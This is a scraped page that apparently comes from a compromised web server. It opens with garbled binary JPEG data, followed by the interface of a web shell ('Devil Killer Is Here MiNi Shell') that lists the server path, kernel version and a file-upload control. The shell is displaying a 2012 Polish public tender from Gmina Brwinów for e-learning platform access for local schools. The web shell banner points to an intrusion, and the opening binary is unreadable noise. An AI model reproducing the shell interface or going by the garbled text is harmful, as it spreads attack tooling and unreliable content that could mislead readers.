JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/74343-N-2012.html

<p class="kh_header"><b>Brwinów: CZĘŚĆ 1: dostęp do platformy e-learningowej z gotowym kursem języka angielskiego,
CZĘŚĆ 2: dostęp do platformy e-learningowej z gotowym kursem informatyki,
CZĘŚĆ 3: dostęp platformy e-learningowej z gotowym kursem matematyki,
w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 74343 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CZĘŚĆ 1: dostęp do platformy e-learningowej z gotowym kursem języka angielskiego,
CZĘŚĆ 2: dostęp do platformy e-learningowej z gotowym kursem informatyki,
CZĘŚĆ 3: dostęp platformy e-learningowej z gotowym kursem matematyki,
w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest uruchomienie i zapewnienie dostępu do platformy e-learningowej z gotowymi kursami z języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Projekt realizowany w ramach umowy nr UDA-POKL.09.01.02-14-079/10-00.
Kursy szkoleniowe w oparciu o platformy e-learningowe są realizowane w ramach metody blended learningu w Zespole Szkół  Nr 2 przy ul. Żwirowej 16 w Brwinowie, Zespole Szkół przy ul. Piaseckiego 2 w Otrębusach od kwietnia 2012 roku do czerwca 2013 roku (13 miesięcy) z wyłączeniem miesięcy lipiec- sierpień 2012 r.- okres ferii letnich.
2.  Przedmiot zamówienia obejmuje:
1) CZĘŚĆ 1:Dostęp do: platformy e-learningowej gotowego kursu - kontentu - języka angielskiego.
2) CZĘŚĆ 2: Dostęp do: platformy e-learningowej gotowego kursu - kontentu informatyki.
3) CZĘŚĆ 3: Dostęp do: platformy e-learningowej gotowego kursu - kontentu matematyki.
4) Na okres od dnia podpisania umowy dotyczącej platformy e-learningowej gotowego kursu - kontentu - języka angielskiego dla 36 uczniów z ZS nr 2 w Brwinowie i 24 uczniów ZS w Otrębusach do 30.06.2013 r. wraz z zasobami i funkcjonalnościami opisanymi poniżej.
5) Na okres od dnia podpisania umowy dotyczącej platformy e-learningowej gotowego kursu - kontentu - informatyki dla 12 uczniów z ZS nr 2 w Brwinowie do 30.06.2013 r. wraz z zasobami i funkcjonalnościami opisanymi poniżej.
6) Na okres od dnia podpisania umowy dotyczącej platformy e-learningowej gotowego kursu - kontentu - matematyki dla 12 uczniów z ZS w Otrębusach do 30.06.2013 r. wraz z zasobami i funkcjonalnościami opisanymi poniżej.
7) Udostępnienie platform w okresie od dnia podpisania umów dla wszystkich użytkowników przez 24 godziny, 7 dni w tygodniu, z wyłączeniem miesięcy lipiec- sierpień 2012 r., okres ferii letnich.
8) Platformy e-learningowe będą pełnić funkcję informacyjno-szkoleniową oraz funkcję diagnozująco - egzaminującą wiedzę uczniów z zakresu przedmiotów objętych e-learningiem.
9) Opłaty za użytkowanie platform firmą wnoszone będą w systemie miesięcznym- przez okres trwania projektu, z wyłączeniem miesięcy lipiec - sierpień 2012 r. - okres ferii letnich.
10) Użytą w niniejszej dokumentacji terminologię należy rozumieć zgodnie z przedstawionymi poniżej definicjami:
a) Platforma e-learningowa - infrastruktura sprzętowa i programowa tworząca spójną platformę systemową, obejmująca oprogramowanie do prowadzenia nauki na odległość. 
b) Uczeń, użytkownik  - osoba korzystająca z platformy.
c) Nauczyciel, osoba prowadząca zajęcia on-line oraz w niniejszym opracowaniu używane są wymiennie.
d) Administrator - osoba zajmująca się infrastrukturą techniczną oraz wprowadzaniem zmian parametrów systemu.
e) Instrukcja użytkownika - opis czynności i zasad umożliwiających użytkownikom platformy e-learningowej wykorzystywanie wszystkich jej cech funkcjonalnych. Instrukcja winna być sporządzona w języku polskim przy użyciu prostego słownictwa łatwego do przyswojenia a dodatkowo na platformie w witrynie internetowej winna być zamieszczona instrukcja graficzna z elementami zrzutów ekranowych oraz instrukcja video zawierająca zbiór opisów wszystkich czynności możliwych do wykonania przez użytkownika.
f) Kurs języka angielskiego, kurs informatyki, kurs matematyki - realizuje uczeń po zalogowaniu się na platformy e-learningowe w wybranym bloku szkoleniowym, rozumiany jako technika i metoda szkolenia na odległość, wykorzystujący Internet. Kurs e-learningowy umożliwia użytkownikowi samodzielne wybranie preferowanego  tempa wiedzy jej przekazywania oraz jej zaliczenia na podstawie przerobionego przez użytkownika materiału dydaktycznego.
g) Jednostka e-learningowa - dział tematyczny z danego przedmiotu.           Wskazane jest, aby projekt jednostki e-learningowej uwzględniał podział treści na niewielkie części, możliwe do pokazania w sposób czytelny na monitorze komputera użytkownika. W przypadku prezentacji materiału w formie tekstowej należy umożliwić uczestnikom szkolenia możliwość wydruku materiałów.
Schemat ogólny przykładowej jednostki e-learningowej:
I.	Strona tytułowa.
A. Informacje wstępne. 
1. Cele (tematu, działu tematycznego, itp.).
B. Treść jednostki (Materiał do przyswojenia). 
C. Zadania/ćwiczenia.
D. Quizy sprawdzające wiedzę.
E. Materiały dodatkowe, np. krzyżówki, mapy, itp.
Przedstawiona powyżej struktura jednostki e-learningowej może ulegać modyfikacjom w zależności od rodzaju prezentowanych treści. 
11) Poziomy wiedzy w ramach kursów:
a) Kurs języka angielskiego realizowany będzie na dwóch poziomach: szkoły podstawowej (kl. IV-VI), gimnazjum (kl. I-II), korzystać z niego będzie 5 grup 12 osobowych. Uczeń posiadający wykupiony dostęp do platformy powinien mieć możliwość z korzystania z różnych stopni zaawansowania A1, A2, B1, B2, C1 w ramach kontenetu gotowego kursu języka angielskiego.
b) Kurs informatyki realizowany będzie na poziomie klasy IV-VI szkoły podstawowej, korzystać z niego będzie 12 osobowa grupa uczniów.
c) Kurs matematyki realizowany będzie na poziomie I-II klasy gimnazjum, korzystać z niego będzie 12 osobowa grupa uczniów. (zgodnie z programem).
12) Jednostka e-learningowa składa się z 3 części:
a) część dydaktyczna - teoretyczna materiału nauczania, która może przybierać dowolną formę multimedialną, na jaką pozwalają technologie internetowe, w szczególności: tekst, grafika, obrazy, animacja, wideo, audio, pliki do pobrania.
b) część ćwiczeniowa - zadania z rozwiązaniami. Zadanie powinno zawierać komentarz lub podpowiedź do sposobu jego rozwiązania. Po przesłaniu rozwiązania uczeń otrzymuje za pomocą poczty e-mail wewnętrznej informację zwrotną dotyczącą poprawności rozwiązania zadania.
c) część diagnostyczna - quiz sprawdzający poziom opanowania materiału nauczania. Quizy powinny być automatycznie oceniane. Do quizów można podchodzić wielokrotnie. Pytania i  odpowiedzi do quizów mogą być wymieszane. 
13) Objętości dla kursu języka angielskiego powinny wynosić średnio 40 jednostek e-learningowych, dla kursu informatyki średnio 20 jednostek e-learningowych i dla kursu matematyki średnio 30 jednostek e-learningowych.
a) Kurs języka angielskiego - ilość ekranów przypadająca na jedną jednostkę e-learningową w przedziale 10-20 ekranów, uczeń ma dostęp do każdego poziomu - stopni zaawansowania języka angielskiego,
b) Kurs informatyki - ilość ekranów przypadająca na jedną jednostkę e-learningową w przedziale 5-10 ekranów,
c) Kurs matematyki - ilość ekranów przypadająca na jedną jednostkę e-learningową w przedziale 5-10 ekranów.
Uczniowie na dostęp, realizacje i wykonanie poszczególnych jednostek e-learningowych będą mieli nielimitowany czas. 
Uczestnicy będą mogli korzystać z kursów w sposób nieograniczony z wyłączeniem przerw technicznych. Kursy powinny być opracowane, w taki sposób aby uczniowie, mieli możliwość wielokrotnego powtarzania materiału już przerobionego na platformie e-learningowej.
Po konsultacji z osobą prowadzącą zajęcia z dyrektorem szkoły oraz określony zakres merytoryczny kursów. Zakres merytoryczny zostanie dopasowany do możliwości grup.
Jednostki e-learningowe (z danego kursu) zamieszczone na platformach e-learningowych  powinny być na nich dostępne odpowiednio dla ZS nr 2 w Brwinowie oraz ZS w Otrębusach do 30.06.2013 r.
14) Wymagania wobec jednostek e-learningowych kursów:
Wykonawcy muszą dysponować zasobem jednostek e-learningowych, spełniając       poniższe warunki:
a) każda z jednostek e-learningowych musi być zrealizowana w języku polskim, poza jednostkami z języka angielskiego, w których jednak polecenia do zadań muszą być   w języku polskim,
b) jednostki e-learningowe muszą zawierać głos lektora, interakcje, bądź animacje,
c) tematy i treści jednostek e-learningowych powinny być: skonsultowane z osobami prowadzącymi zajęcia, dostosowane do poziomu wiedzy uczestników e-lerningowych kursów oraz zgodne z zagadnieniami z Rozporządzenia Ministra Edukacji Narodowej z dnia 23 grudnia 2008 r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół (rozporządzenie zostało opublikowane w Dzienniku Ustaw z dnia 15 stycznia 2009 r. Nr 4, poz. 17).
15) Każdy uczestnik kursu języka angielskiego, informatyki i matematyki który ukończony kurs na platformie e-learningowej otrzyma Certyfikat ukończenia kursu e-learningowego. 
16) Wykonawca w ramach kursu języka angielskiego założy docelowo około 63 kont na platformie e-learningowej (60 uczniów* pkt.19 i 5 osób prowadzących zajęcia) wraz z jednorazowymi hasłami dostępu. Loginy i hasła dostępowe do kont zostaną udostępnione Zamawiającemu. Korzystając z loginu i jednorazowego hasła dostępu użytkownik podczas pierwszego logowania zostanie poproszony o zmianę hasła.
17) Wykonawca w ramach kursu informatyki założy docelowo około 13 kont na platformie e-learningowej (12 uczniów* pkt.19 i 1 osoba prowadząca zajęcia) wraz z jednorazowymi hasłami dostępu. Loginy i hasła dostępowe do kont zostaną udostępnione Zamawiającemu. Korzystając z loginu i jednorazowego hasła dostępu użytkownik podczas pierwszego logowania zostanie poproszony o zmianę hasła.
18) Wykonawca w ramach kursu matematyki założy docelowo około 13 kont na platformie e-learningowej (12 uczniów* pkt.19 i 1 osoba prowadząca zajęcia) wraz z jednorazowymi hasłami dostępu. Loginy i hasła dostępowe do kont zostaną udostępnione Zamawiającemu. Korzystając z loginu i jednorazowego hasła dostępu użytkownik podczas pierwszego logowania zostanie poproszony o zmianę hasła.
19) Wykonawcy w ramach realizacji zamówienia zapewnią płynne działanie kompleksowej usługi platform e-learningowych przez okres funkcjonowania projektu. Wykonawcy powinni dysponować osobami posiadającymi kwalifikacje i doświadczenie niezbędne do należytego wykonania tego obowiązku.
20) Wykonawcy wyrażą zgodę na zwiększenie liczby użytkowników w granicach do 10 % w szczególności w przypadku konieczności wprowadzenia nowych użytkowników przed coroczną ich aktualizacją. Zwiększenie liczby uczestników do 10% nie uprawnia Wykonawcy do zwiększonego wynagrodzenia, a ewentualne koszty z tytułu zwiększenia liczby użytkowników winien on uwzględnić w cenie oferty.
21) Wykonawcy zobowiązani są do prowadzenia systematycznej dokumentacji oraz sprawozdawczości miesięcznej i końcowej zgodnej z wymogami projektu. Wykonawcy przekazują miesięczny raport merytoryczny z realizacji zajęć do 10 dnia każdego kolejnego miesiąca. Raport końcowy Wykonawcy przekażą Zamawiającemu najpóźniej do 10.07.2013 r. 
22) Raport powinien zawierać:
a) Opis wykonanych zadań w danym okresie sprawozdawczym wraz z harmonogramem
działań.
b) Statystyki dotyczące uczestników w zależności od rodzaju kursu: języka angielskiego, informatyki i matematyki w tym: liczbę podejść do quizów/testów; czas jaki uczeń spędza/spędził na kursie, zestawienie wyników nauczania e-learningowego (liczba uczniów, którzy zaliczyli/nie zaliczyli danego quizu/testu; najwyższy/najniższy wynik danego quizu/testu; średni wynik uzyskany przez uczniów) w danej jednostce e-learningowej.
c) Napotkane problemy w trakcie realizacji zadań wraz z opisem planowanej bądź przeprowadzonej reakcji na problem.
d) Raporty miesięczne należy złożyć w formie elektronicznej na adres mailowy wskazany przez Zamawiającego.
e) Raporty z wykonania poszczególnych etapów realizacji usługi ( etap szkolenia, etap realizacji projektu w ramach dostępu do platformy e-.learningiwej) oraz raport końcowy należy złożyć w formie elektronicznej oraz papierowej w formacie strony A4, czcionka Times New Roman 12, druk jednostronny (w zależności od potrzeb w kolorze), całość zszyta/zbindowana, podpisana przez Wykonawcę.
23) Platformy e-learningowe muszą spełniać następujące funkcjonalności:
a) w ramach zarządzania użytkownikami system musi pozwalać na dodawanie różnych typów użytkowników (uczniów, nauczycieli, administratorów), rejestrację użytkowników, tworzenie i edycję użytkowników, nadawanie użytkownikom loginów i haseł z opcją samodzielnej zmiany hasła przez danego użytkownika;
b) platformy muszą pozwalać na bieżące monitorowanie i uzyskiwanie raportów w zakresie: rejestrowania i archiwizowania w bazie danych czynności wykonywanych przez użytkowników, monitorowania postępów poszczególnych użytkowników w obrębie danego kursu lub zadania, możliwość generowania wykresów i możliwość eksportowania wyników do pliku .xls lub .ods;
c) na platformach powinna być zamieszczona aktualna, szczegółowa instrukcja jej obsługi; 
d) na platformach powinien się znajdować dział FAQ dotyczący działania i obsługi   platform;
e) działanie aplikacji musi być monitorowane zarówno od strony serwerów jak i od strony Internetu, co najwyżej w interwałach 15-to minutowych (dopuszcza się krótsze czasokresy), przez 24 godziny na dobę, przez wszystkie dni w roku;
f) Wykonawcy zobowiązują się do niezwłocznego likwidowania awarii wpływających na prawidłowe działanie aplikacji i jej dostępność dla użytkowników końcowych;
g) Wykonawcy gwarantują, że czas trwania awarii w czasie roku szkolnego nie będzie dłuższy niż: łączny czas trwania awarii (w godzinach): 72 godziny i maksymalny czas od momentu wykrycia awarii (problemu) do momentu jej usunięcia każdorazowo nie może przekroczyć 12 godzin
h) Wykonawcy poinformuja użytkowników platform o terminach planowanych przerw technicznych w świadczeniu usług z co najmniej 48 godzinnym wyprzedzeniem; łączny czas trwania przerw technicznych nie może przekraczać 84 godziny w ciągu roku szkolnego, przerwy techniczne mogą być planowane jedynie w godzinach 20.00-8.00; 
i) działanie platformy nie może zależeć od awarii pojedynczego dostawcy łącza internetowego; wymagana jest konfiguracja wykorzystująca co najmniej dwóch równoległych dostawców, z automatycznym przełączeniem w razie awarii;
j) platformy muszą spełniać wymogi GIODO - Generalnego Inspektoratu Ochrony Danych Osobowych w zakresie ochrony danych osobowych, mowa zarówno o ochronie fizycznej: serwery, Centrum danych, jak i ochronie programowej: systemy firewall, odpowiednie zabezpieczenie aplikacji;
k) *zintegrowana wewnętrzna poczta e-mail, adres e-mail dla każdego użytkownika platformy, klient poczty e-mail nie wymagający konfigurowania zewnętrznych programów pocztowych;
l) Platformy e-learningowe muszą posiadać  funkcjonalności zgłoszenia i obsługi uwag technicznych co do jej pracy lub poprawności kontentu.
24) Wsparcie techniczne, hepl desk.
Wykonawcy zapewnia płynność działania usługi wsparcia technicznego dla platform e-learningowych w okresie funkcjonowania projektu za pomocą poczty elektronicznej. Usługa wsparcia technicznego powinna być bezpłatna dla użytkowników i dostępna dla nich w godzinach 8.00 - 20.00 w dni robocze. 
Wykonawcy zobowiązani są do zapewnienie oprogramowania wraz z potrzebnymi licencjami i infrastrukturę sprzętową niezbędną do realizacji określonego rodzaju kursu. Za koszty związane z kolokacją/hostingiem, wdrożeniem i utrzymaniem polityki bezpieczeństwa, kontrolą, wydajności, administracją i zarządzaniem, upgradami/updatami sprzętu i oprogramowania, dokumentacją, backupami oraz wszystkimi innymi czynnościami niezbędnymi do poprawnego i bezpiecznego funkcjonowania wszystkich systemów wchodzących w skład rozwiązania dostarczonego przez Wykonawców  w ciągu trwania umowy odpowiedzialni są Wykonawcy. Wykonawcy zobowiązani są do przeszkolenia wszystkich użytkowników platform e-learningowych (uczniów i osób prowadzących zajęcia w ramach blended learningu) z korzystania i logowania się na platformie.

Miejsce wykonania przedmiotu niniejszego postępowania dotyczy:
-Uczniowie i nauczyciele  korzystać będą z platform e-learningowych i przygotowanych na nich gotowych kursów z komputerów osobistych - domowych, nie w pracowniach szkolnych.
- W szkołach zostaną wszyscy użytkownicy platform (uczniowie i nauczyciele) przeszkoleni z ich obsługi. Koszt szkolenia leży po stronie Wykonawców.

3. Sposób realizacji przedmiotu zamówienia określony został we wzorze umowy stanowiącym załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują co najmniej 2 usługi polegające na udostępnieniu platformy e-learningowej z kursami szkoleniowymi, potwierdzone dokumentami o należytym wykonaniu;

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.
2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) załącznik nr 2- oświadczenie o spełnianiu warunków udziału w postępowaniu;
2) załącznik nr 3 - wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane;
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

